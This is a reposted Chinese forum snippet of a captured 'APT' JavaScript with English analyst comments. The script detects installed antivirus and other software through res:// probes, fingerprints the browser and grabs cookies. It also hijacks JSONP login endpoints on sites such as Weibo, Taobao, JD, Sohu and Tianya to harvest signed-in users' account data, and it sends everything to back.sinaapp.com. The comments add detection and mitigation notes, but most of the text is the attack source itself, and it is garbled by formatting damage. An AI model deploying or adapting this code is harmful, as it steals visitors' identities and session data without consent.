
抓到一个搞APT的JS

代码具体有什么用我就不说了,有多屌自己看撒。

 

// NOTE(review): captured reconnaissance / account-harvesting script, preserved verbatim for analysis.
// The listing is not runnable as pasted: quotes were rendered as typographic ‘ ‘, the original line
// breaks were collapsed (so each `//` comment now swallows the rest of its physical line), and several
// `.src =` assignments carry an injected "http://www.mamicode.com/" prefix from the reposting site.
// Stage 1 (up to `window.onerror` below): under IE only, an Image is pointed at res://<disk><path>
// for every entry of `disk` x `soft`; an Image whose height != 30 or width != 28 is taken as
// "resource found", i.e. the program is installed, and its name is appended to `havesoft`. The list
// is mostly AV products, office suites, VMware, TrueCrypt and a few Chinese desktop apps. An IIFE
// then beacons location, top.location, `havesoft` and the opener URL to back.sinaapp.com (id=bt1kyY),
// and window.onerror is set to return true so any failure stays silent. Detection angle: a burst of
// res:// image loads followed by a 1x1-image GET to that host carrying a softver= parameter.
//Uses JavaScript with the res:// protocol to test whether software is installed.//havesoft holds the names of detected software. var havesoft = ‘no ie ‘; function program(name, path){    this.name = name;    this.path = path;}//Disks to enumerate; defaults to scanning C and D. var disk=[‘c‘,‘d‘]; //soft lists the usual install path of each program to detect and the resource ID to probe.    var soft=[new program(‘office 2003‘, ‘:\\Program Files\\Microsoft Office\\OFFICE11\\STSLIST.DLL/2/10100‘),            new program(‘office2007‘, ‘:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE/2/5500‘),            new program(‘360安全卫士‘, ‘:\\Program Files\\360\\360Safe\\360leakfixer.exe/2/110‘),            new program(‘360保险箱‘, ‘:\\Program Files\\360\\360safebox\\BoxChecker.exe/2/203‘),            new program(‘WinRAR‘, ‘:\\Program Files\\WinRAR\\WinRAR.exe/2/101‘),            new program(‘QQ 2009‘, ‘:\\Program Files\\Tencent\\QQ\\Bin\\RICHED20.DLL/2/2100‘),            new program(‘暴风影音‘, ‘:\\Program Files\\StormII\\StormSkinRes.dll/2/193‘),            new program(‘迅雷‘, ‘:\\Program Files\\Thunder Network\\Thunder\\Program\\Thunder.exe/2/138‘),            new program(‘360杀毒‘, ‘:\\Program Files\\360\\360sd\\mfc42u.dll/2/26567‘),            new program(‘Foxit Reader‘, ‘:\\Program Files\\Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/279‘),            new program(‘Visual C++ 6.0‘, ‘:\\Program Files\\Microsoft Visual Studio\\VC98\\Setup\\1033\\VC98ENT.DLL/2/101‘),            new program(‘Visual Studio 2008‘, ‘:\\Program Files\\Microsoft Visual Studio 9.0\\Common7\\IDE\\devenv.exe/2/6609‘),            new program(‘VMware‘, ‘:\\Program Files\\VMware\\VMware Workstation\\p2vWizard.dll/2/134‘),            new program(‘Maxthon2‘, ‘:\\Program Files\\Maxthon2\\Maxthon.exe/2/128‘),            new program(‘Daemon Tools lite‘, ‘:\\Program Files\\DAEMON Tools Lite\\DTCommonRes.dll/2/209‘),            new program(‘EditPlus 3‘, ‘:\\Program Files\\EditPlus 3\\editplus.exe/2/126‘),            new program(‘TrueCrypt‘, ‘:\\Program Files\\TrueCrypt\\TrueCrypt.exe/2/112‘),            new program(‘Foxmail‘, ‘:\\Program 
Files\\Foxmail\\foxmail.exe/2/RAM‘),            new program(‘Nod32 AntiVirus‘, ‘:\\Program Files\\ESET\\ESET NOD32 Antivirus\\mfc80.dll/2/32384‘),            new program(‘Nmap‘, ‘:\\Program Files\\Nmap\\Uninstall.exe/2/110‘),            new program(‘WinSCP‘, ‘:\\Program Files\\WinSCP\\WinSCP.exe/2/BBALL‘),            new program(‘Kaspersky Internet Security 2010‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\avzkrnl.dll/2/BBALL‘),            new program(‘瑞星杀毒‘, ‘:\\Program Files\\Rising\\Rav\\RsConfig.dll/2/100‘),            new program(‘BitDefender 2010‘, ‘:\\Program Files\\BitDefender\\BitDefender 2010\\history.exe/2/301‘),            new program(‘Avast4‘, ‘:\\Program Files\\Alwil Software\\Avast4\\ashAvast.exe/2/267‘),            new program(‘Avira AntiVir Desktop‘, ‘:\\Program Files\\Avira\\AntiVir Desktop\\rcimage.dll/2/106‘),            new program(‘F-Secure‘, ‘:\\Program Files\\F-Secure\\Anti-Virus\\fsavinst.dll/2/100‘),            new program(‘McAfee VirusScan Enterprise‘, ‘:\\Program Files\\McAfee\\VirusScan Enterprise\\nailite.dll/2/110‘),            new program(‘金山毒霸‘, ‘:\\Program Files\\Kingsoft\\Kingsoft Antivirus\\krecycle.exe/2/130‘),            new program(‘趋势安全专家‘, ‘:\\Program Files\\Trend Micro\\Internet Security\\TmChLang.exe/2/30994‘),            new program(‘Kaspersky Internet Security 6.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\oeas.dll/2/206‘),            new program(‘Kaspersky Internet Security 7.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\oeas.dll/2/206‘),            new program(‘Kaspersky Internet Security 2009‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206‘),            new program(‘AVG AntiVirus 9‘, ‘:\\Program Files\\AVG\\AVG9\\avguires.dll/2/100‘),            new program(‘江民杀毒‘, ‘:\\Program Files\\JiangMin\\AntiVirus\\KvpViewer.exe/2/133‘),            new program(‘ZoneAlarm‘, ‘:\\Program Files\\Zone 
Labs\\ZoneAlarm\\framewrk.dll/2/102‘),                        new program(‘我形我速4‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),                        new program(‘我形我速5‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),                        new program(‘我形我速6‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),                        new program(‘我形我速4‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),                        new program(‘我形我速5‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),                        new program(‘我形我速6‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),            new program(‘Adobe Reader 9.0‘, ‘:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AcroRd32.dll/2/103‘)];//Loop over each disk and path and test whether the file exists; if it does, the program is present. if(navigator.userAgent.indexOf("MSIE")>= 0){  havesoft =‘ ‘;  for(i=0;i<soft.length;i++)  {       for(j=0;j<disk.length;j++)       {           var img=new Image();    //create a new Image object           res=‘res://‘+disk[j]+soft[i].path;   //reference the resource file through the res:// protocol        img.src=http://www.mamicode.com/res;   //assign the res:// resource to img        if(img.height!=30 || img.width != 28)   //if height is not 30 or width is not 20 (the code actually compares 28), the image is taken to exist.        {               havesoft = havesoft + soft[i].name + ‘, ‘;           }       }     }}(function(){(new Image()).src=http://www.mamicode.com/‘http://back.sinaapp.com/index.php?do=api&id=bt1kyY&location=‘+escape((function(){try{return document.location.href}catch(e){return ‘‘}})())+‘&toplocation=‘+escape((function(){try{return top.location.href}catch(e){return ‘‘}})())+‘&softver=‘+escape((function(){try{return havesoft}catch(e){return ‘‘}})())+‘&opener=‘+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:‘‘}catch(e){return ‘‘}})());})();window.onerror=function(){    return true;}http_server = 
// Stage 2: `http_server` is the collection endpoint reused by every beacon below (payload in
// content1=, label in content2=). `info` is a browser fingerprint: UA family/version from regexes,
// URL, escaped UA, language, referrer, location, top.location, the current page's cookie (escaped),
// domain, title, screen size and Flash version (plugin scan, or ActiveX probing via eval on IE).
// inj_script appends a <script> to <body> and runs the optional callback on load / readyState.
"http://back.sinaapp.com/index.php?do=api&id=bt1kyY&content1=";var info = {};info.browser = function(){    ua = navigator.userAgent.toLowerCase();    var rwebkit = /(webkit)[ \/]([\w.]+)/;    var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/;    var rmsie = /(msie) ([\w.]+)/;    var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/;    var match = rwebkit.exec( ua ) ||    ropera.exec( ua ) ||    rmsie.exec( ua ) ||    ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) ||    [];    return {        name: match[1] || "", version: match[2] || "0"    };}();info.url =  document.location.href;info.ua = escape(navigator.userAgent);info.lang = navigator.language;info.referrer = document.referrer;info.location = window.location.href;info.toplocation = top.location.href;info.cookie = escape(document.cookie);info.domain = document.domain;info.title = document.title;info.screen = function(){    var c = "";    if (self.screen) {        c = screen.width+"x"+screen.height;    }    return c;}();info.flash = function(){    var f="",n=navigator;    if (n.plugins && n.plugins.length) {        for (var ii=0;ii<n.plugins.length;ii++) {            if (n.plugins[ii].name.indexOf(‘Shockwave Flash‘)!=-1) {                f=n.plugins[ii].description.split(‘Shockwave Flash ‘)[1];                break;            }        }    }    else    if (window.ActiveXObject) {        for (var ii=10;ii>=2;ii--) {            try {                var fl=eval("new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash."+ii+"‘);");                if (fl) {                    f=ii + ‘.0‘;                    break;                }            }            catch(e) {}                }    }    return f;}();function inj_script(a, b) {    var o = document.createElement("script");    o.src = a;    if (b) {        if (!window.ActiveXObject) {            o.onload = b;        }        else {            o.onreadystatechange = function () {                if (o.readyState == ‘loaded‘ || o.readyState == ‘complete‘) {                    
// (Stage 2 continues: `b()` below is the readyState callback inside inj_script.)
// Stage 3: json2str serialises any value into a quoted-key / quoted-value string. Each global
// function that follows is named after the `callback=` value of a JSONP endpoint loaded in
// window.onload, so whatever the site returns for the currently logged-in user is handed straight
// to it and forwarded to http_server (JSONP callback hijacking of authenticated responses).
b();                }            }        }    }    document.getElementsByTagName("body")[0].appendChild(o);    return o;}function json2str(o) {    if(typeof o == ‘string‘) return o;    var arr = [];    var fmt = function(s) {        if (typeof s == ‘object‘ && s != null) return json2str(s);        return /^(string|number)$/.test(typeof s) ? "‘" + s + "‘" : s;    }    for (var i in o) arr.push("‘" + i + "‘:" + fmt(o[i]));    return ‘{‘ + arr.join(‘,‘) + ‘}‘;}video_login_callback = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=video_login_callback";}e163_comment = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=e163_comment";}weibo_login = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=weibo_login";}sina_1368631232407449 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sina_1368631232407449";}jingdong_service = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jingdong_service";}loginInfoJson = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=loginInfoJson";}hxbase_json1368703155802logininfo = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=hxbase_json1368703155802logininfo";}jsonp1368703516133 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368703516133";}ajaxLogan_updateNickName = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=ajaxLogan_updateNickName";}jsonp1368705676193 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368705676193";}jsonp1368706291697 = function(o){    new Image().src = 
// Stage 4 (window.onload): beacon `info`, then inject the JSONP URLs below, one per try/catch so a
// failing site never stops the rest. Endpoints with no matching callback function here are
// presumably consumed through globals they define (Blog.camp.profile, _passport,
// PM.PMListLoaded(), sso_username, tianya_msg), which the setTimeout blocks read 3 s later.
// Mitigation on the site side: do not expose account state through JSONP or script responses
// without a per-request token, and mark session cookies SameSite so cross-site loads stay anonymous.
http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368706291697";}jsonp1368751970360 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368751970360";}jQuery1368754535817 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368754535817";}jQuery1368758656634 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368758656634";}window.onload = function(){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(info)) +"&content2=info%20";    try{        inj_script(‘http://video.baidu.com/d?m=uss&callback=video_login_callback‘);    }    catch(e){}    try{        inj_script(‘http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment‘);    }    catch(e){}    try{        inj_script(‘http://weibo.com/ajaxlogin.php?framelogin=0&callback=weibo_login‘);    }    catch(e){}    try{        inj_script(‘http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449‘);    }    catch(e){}    try{        inj_script(‘http://passport.jd.com/new/helloService.ashx?m=ls&callback=jingdong_service‘);    }    catch(e){}    try{        inj_script(‘http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713‘);    }    catch(e){}    try{        inj_script(‘http://shequ5.tool.hexun.com/rest/checkjson.aspx?callback=hxbase_json1368703155802logininfo‘);    }    catch(e){}    try{        inj_script(‘http://i.56.com/api/getHomeLink.php?callback=jsonp1368703516133‘);    }    catch(e){}    try{        inj_script(‘http://my.pconline.com.cn/intf/getLogedUser.jsp?callback=ajaxLogan_updateNickName‘);    }    catch(e){}    try{        inj_script(‘http://passport.mop.com/common/user-info?callback=jsonp1368705676193‘);    }    catch(e){}    try{        
inj_script(‘http://jiaoyou.51.com/?c=grade&a=getMyInfoJsonp&callback=jsonp1368706291697&ie=0&_=1368706293192‘);    }    catch(e){}    try{        inj_script(‘http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360‘);    }    catch(e){}    try{        inj_script(‘http://lc.tiexue.net/p.tx?c=jQuery1368754535817&_=1368754537944‘);    }    catch(e){}    try{        inj_script(‘http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639‘);    }    catch(e){}    try{        inj_script(‘http://random.blog.sohu.com/service/profile.jsp‘);    }    catch(e){}    try{        inj_script(‘http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1368671343288‘);    }    catch(e){}    try{        inj_script(‘http://api.t.qq.com/inbox/pm_list.php?count1=30&t=wbpm_list.js&resp_charset=UTF8&first=1&pmlang=zh_TW&r=0.36978532862849534‘);    }    catch(e){}    try{        inj_script(‘http://blog.ifeng.com/misc.php?script=getusername&tm=1368689210147‘);    }    catch(e){}    try{        inj_script(‘http://www.tianya.cn/api/msg?method=messagesys.selectmessage&params.pageSize=1&params.pageNo=1&_=1368693252438&var=tianya_msg‘);    }    catch(e){}    setTimeout(function(){        var o = Blog.camp.profile;        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=Blog.camp.profile";    }    ,3000);    setTimeout(function(){        var o = [_passport];        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=%5B_passport%5D";    }    ,3000);    setTimeout(function(){        var o = PM.PMListLoaded().ma+‘|‘+PM.PMListLoaded().mn+‘|‘+PM.PMListLoaded().micn;        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=PM.PMListLoaded%28%29.ma%2B%27%7C%27%2BPM.PMListLoaded%28%29.mn%2B%27%7C%27%2BPM.PMListLoaded%28%29.micn";    }    ,3000);    setTimeout(function(){        var o = sso_username;        new Image().src = 
http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sso_username";    }    ,3000);    setTimeout(function(){        var o = tianya_msg.data.list[0].toUserName+‘|‘+tianya_msg.data.list[0].toUserId;        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=tianya_msg.data.list%5B0%5D.toUserName%2B%27%7C%27%2Btianya_msg.data.list%5B0%5D.toUserId";    }    ,3000);};

 
